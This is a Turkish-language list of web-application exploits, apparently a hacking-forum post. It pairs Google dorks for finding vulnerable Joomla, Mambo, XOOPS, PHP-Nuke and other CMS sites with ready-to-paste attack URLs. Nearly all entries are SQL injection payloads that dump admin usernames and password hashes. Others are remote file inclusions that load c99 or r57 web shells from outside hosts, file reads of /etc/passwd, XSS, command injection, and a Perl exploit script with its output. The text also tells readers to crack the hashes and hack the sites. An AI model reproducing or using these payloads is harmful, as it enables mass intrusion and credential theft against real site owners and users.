Example (Exploid): http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELE CT+1,2,3,concat_ws(0x203a20,user_name,user_passwor d,user_email),5,6,7+from+allmyphp_user+where+user_ id=1--
123FlashChat Açığı
DORKS : "123flashchat.php"
EXPLOITS :
Http://localhost/path/123flashchat.php?e107path=Shell
AlphaContent 2.5.8 © Açığı
DORK 1 : inurl: "com_alphacontent"
DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
Exploit :
index.php?option=com_alphacontent§ion=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
Mambo Component (com-downloads) Açığı
DORK : allinurl :"com_downloads"filecatid
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
MiniNuke 2.1 Açığı
DORK 1 : allinurl:"members.asp?action"
DORK 2 : allinurl: "members.asp"uid
EXPLOIT 1 :
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,s ifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1, 1,1,1,1%20from%20members
EXPLOIT 2 :
members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0 ,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20 from%20members
EXPLLOIT 3 :
members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1 ,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2 ,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20mem bers
Modules-Wepchat Açığı
DORK : allinurl :"modules/WebChat"
EXPLOIT :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Repice Açığı
DORK : allinurl :"modules/recipe"
EXPLOIT :
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
eXV2 MyAnnonces Açığı
DORK : eXV2 MyAnnonces
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3 a,1/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Dictionary Açığı
DORK 1 : allinurl: "modules/dictionary"
DORK 2 : allinurl: "modules/dictionary/print.php?id"
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Geçerli versiyonlar;
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
Com-Restaurante Açığı
DORK : allinurl: "com_restaurante"
EXPLOIT :
index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,conca t(username,0x3a,password)/**/from/**/jos_users/*
Com-Accombo Açığı
DORK : allinurl: "com_accombo"
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*
Powered By Runcms Açığı
DORK 1 : allinurl: "modules/photo/viewcat.php?id"
DORK 2 : inurlhoto "powered by runcms"
EXPLOIT :
admin/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Not: Admin/exploit'i site sonuna yapıştırırsak admin nick verir.
Pass/exploit'i yapıştırırsak md5 leri verir.
Admin girişi:
http://www.bbb.net/admin
Powered By Download 3000 Açığı
DORK 1 : "Powered by Download 3000"
DORK 2 : allinurl: "com_d3000"
EXPLOiT :
index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
Powered By Smoothflash Açığı
DORK 1 : "Powered by Smoothflash"
DORK 2 : allinurl: "admin_view_image.php"
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
Com-Ahsshop Açığı
DORK : allinurl: "com_ahsshop"do=default
EXPLOiT 1 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*
EXPLOiT 2 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*
Mod-Archives Açığı
DORK : allinurl: "index.php?mod=archives"
EXPLOiT :
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
Galery-Action Açığı
DORK : allinurl: "index.php?mod=galerie"action=gal
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*
Powered By Site Sift Açığı
DORK 1 : powered by Site Sift
DORK 2 : allinurl: "index php go addpage"
DORK 3 : allinurl: "index.php?go=detail id="
EXPLOiT 1:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*
EXPLOİT 2:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Galery-İmg Açığı
DORK : allinurl: "index.php?p=gallerypic img_id"
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Galid-Galeri Açığı
DORK : allinurl: galid "index.php?p=gallerypic"
EXPLOiT :
index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Area-Galid Açığı
DORK : allinurl: "index.php?area"galid
EXPLOiT :
index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Shop-Categ Açığı
DORK : allinurl: "index php p shop"categ
EXPLOiT :
index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Showlink Açığı
DORK : allinurl: "index.php?showlink"links
EXPLOiT :
index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
admin login=admin/login.php
RS MAXSOFT Açığı
DORK 1 : "RS MAXSOFT"
DORK 2 : "Provozováno na RS MAXSOFT"
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
PollBooth Açığı
DORK : allinurl: "pollBooth.php?op=results"pollID
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
Showresult Açığı
DORK 1 : allinurl: "index.php?p=poll"showresult
DORK 2 : allinurl: poll_id "showresult"
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user
Fpdb/shop.mdb Açığı
google.com 'da aratacağız;
inurl:"mall/lobby.asp
Sonra çıkan sitenin sonuna ''fpdb/shop.mdb'' ekleyin "tırnaksız".
örnek: http://www.gemdepot.com/mall/lobby.asp
http://www.gemdepot.com/fpdb/shop.mdb
mdb diye dosya çıktı farklı kaydet diyoruz ve açıyoruz...
mdb gizlenmiş şifreyi alıp md5 kırıcı sitede kırıyoruz ve siteye giriş yapıp hackliyoruz...
Xopps Açığı
Dork: inurl:/modules/wfsection/
Exploide:
print.php?articleid=9999999 union select 1111,2222,3333,4444,concat(char(117,115,101,114,11 0,97,109,101,58),u*****char(112,97,115,115,119,111 ,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0 from xoops_users where uid like 1/*
Com_shambo2 Açığı
Dork(Googlede Aratacağımız Kod): "inurl:com_shambo2" (Tırnaklar yok.)
Exploid(Site Sonuna Ekleyeceğimiz Kod);
index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
PHP-Calendar Açığı
Arama : google.com => intitle:"EasyPHPCalendar
Site sonuna(Herhangi biri);
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
Ben'den Bu Kadar İyi Hack'lemeler !
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!
Exploide
1 http://www.target.dk/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat...,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
Example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Exploide:
http://site.com/classifide_ad.php?i...3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Powered By Novus Açığı
Dork: "Powered by Novus"
İnformation server:
http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt
Com-PeopleBook Açığı
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent...at(user,0x203a3a20,password),null,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program...e=../../adm_config/config.php&default_folder=
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php...,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: "inurl
owered by SoftbizScripts" veya "Subscribe Newsletter" Exploit: http://www.ssss.com/hostdirectory/search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
****** Açığıdır...
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=pro...-1 union select 1,2,concat(id,0x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
http://target.org/index.php?app=vid...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,load_file(0x2f6574632f70617 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Powered By Power Editor Açığı
Dork: Powered By Power Editor
Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Açığı
Dork: "inurl:/kmitam/"
Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil
Yöntemi: Shell
BackLinkSpider Açığı
Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider...-1 union select 1,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''
Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt
Not: Html'den sonrasına kendi shell adresiniz gerekli.
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:"/com_mtree/"
Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/[path]/administ...g.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : "com_lmo"
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:"/index.php?option=com_rsfiles"
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Site Sonuna : www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Site Sonuna : http://xxx.net/2007/administrator/c...laflashfun.php?mosConfig_live_site=[attacker]
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Site Sonuna : http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : "BlogMe PHP created by Gamma Scripts"
Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
veya
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
vlBook 1.21 ****** Açığı
****** Download : http://home.vlab.info/vlbook_1.21.zip
DORK : "Powered by vlBook 1.21"
XSS Address : http://example/?l=" <******>alert('xss')</******>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
PHP-Nuke Siir Açığı
DORK 1 : allinurl:"modules.php?name"print
DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Com_JoomlaFlashfun Açığı
Dork: "com_joomlaflashfun"
Example:
http://xxx.net/2007/administrator/c...joomlaflashfun.php?mosConfig_live_site=[xxxx]
Powered By The Black Lily 2007 Açığı
Dork : "Powered By The Black Lily 2007"
EXPLOIT:
http://victim.com/ar/products.php?class=-1 union select 1,2,password,4,username fro m%20admin/*
veya
http://victim.com/en/products.php?class=-1 union select 1,2,3,password,username fro m%20admin/*
JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator...ctions.php?mosConfig_absolute_path=[evilcode]
Rmsoft GS 2.0 Açığı
Dork: intext
owered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.phpExploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Açığı
DORK 1 : allinurl:"com_na_content"
